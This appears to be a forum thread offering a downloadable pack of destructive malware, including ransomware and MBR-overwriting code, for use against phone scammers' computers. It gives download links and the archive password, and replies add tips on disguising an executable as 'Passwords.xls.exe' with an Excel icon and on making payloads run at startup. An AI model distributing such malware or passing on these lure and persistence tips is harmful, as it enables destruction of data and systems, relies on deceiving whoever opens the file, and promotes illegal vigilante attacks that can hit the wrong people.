TONS of Malware to DESTROY dummy scammer computer

Here is a zip file that contains over 1GB of malware. The malware folder contains tons of malware you can use to destroy scammers computer. Even ransomware is included. The bin folder contains some code I created to overwrite the MBR and force a blue screen. What is a MBR? MBR stands for Master Boot Record, which is a boot sector stored on a hard disk drive or other storage device that contains the necessary computer code to start the boot process. It is the first sector of the computer hard drive and tells the computer how the hard drive is partitioned and how to load the operating system. Once the MBR is deleted/overwritten, the computer is completely destroyed and almost impossible to fix / recover. The computer may still work after overwriting the MBR, but a restart will render the computer useless. That is why I programmed the blue screen. Most of the malware in the malware folder destroys the MBR or encrypts all the files via ransomware.
Have fun!

https://drive.google.com/file/d/1IoLsKWC5lgwp-tBufP9AWbz5ODqT47Le/view?usp=sharing (Mirror 1)
https://bit.ly/41l7zEu (Mirror 1 Short)
Dropbox - Malware.zip - Simplify your life (Mirror 2)
Dropbox - Malware.zip - Simplify your life (Mirror 2 Short)

1 Like

A fun tip for this: Rename one of the EXEs to Passwords.xls.exe and leave it on your desktop. Switch the icon to the excel icon.

3 Likes

That’s precisely the method I use for my “can’t resist” programs. Then they swipe it and open it expecting a treasure load, it’s El Churcho.

1 Like

The password for the zip file is 1234

1 Like

Can you secretively put these somewhere that they execute with the machine is restarted? AKA the old “Startup” folder?

1 Like

Not secretly, you would have to use Task Scheduler unless there is something I am missing.

I always thought that anything in to start up folder gets executed no matter what.

I do not promote malicious intent, but IDK because I only have a Macbook Air

yeah, i have a nearly 3GB malware pack as well, works perfectly for dumb scammers